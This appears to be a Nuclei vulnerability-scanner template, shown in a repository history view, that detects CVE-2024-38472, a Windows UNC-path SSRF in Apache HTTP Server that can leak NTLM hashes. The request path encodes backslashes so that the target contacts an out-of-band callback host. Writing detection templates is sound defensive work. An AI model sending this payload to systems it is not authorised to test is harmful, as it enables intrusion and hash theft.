nuclei-templates/http/cves/2024/CVE-2024-38472.yaml

39 lines
1.3 KiB
YAML
Raw Normal View History

1970-01-01 00:00:00 +00:00
id: CVE-2024-38472
info:
2024-08-30 13:09:46 +00:00
name: Apache HTTPd Windows UNC - SSRF
1970-01-01 00:00:00 +00:00
author: pdteam
severity: high
description: |
2024-08-30 13:09:46 +00:00
SSRF in Apache HTTP Server on Windows allows to potentially leak NTML hashes to a malicious server via SSRF and malicious requests or content Users are recommended to upgrade to version 2.4.60 which fixes this issue. Note- Existing configurations that access UNC paths will have to configure new directive "UNCList" to allow access during request processing.
1970-01-01 00:00:00 +00:00
reference:
- https://blog.orange.tw/2024/08/confusion-attacks-en.html
- https://httpd.apache.org/security/vulnerabilities_24.html
- https://security.netapp.com/advisory/ntap-20240712-0001/
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-38472
cwe-id: CWE-918
epss-score: 0.00043
epss-percentile: 0.09569
http:
2024-08-30 13:09:46 +00:00
- method: GET
path:
1970-01-01 00:00:00 +00:00
- "{{BaseURL}}/%5C%5C{{interactsh-url}}/apachehttpd"
2024-08-30 13:09:46 +00:00
matchers-condition: and
1970-01-01 00:00:00 +00:00
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
2024-08-30 13:09:46 +00:00
1970-01-01 00:00:00 +00:00
- type: word
part: interactsh_request
words:
- "/apachehttpd"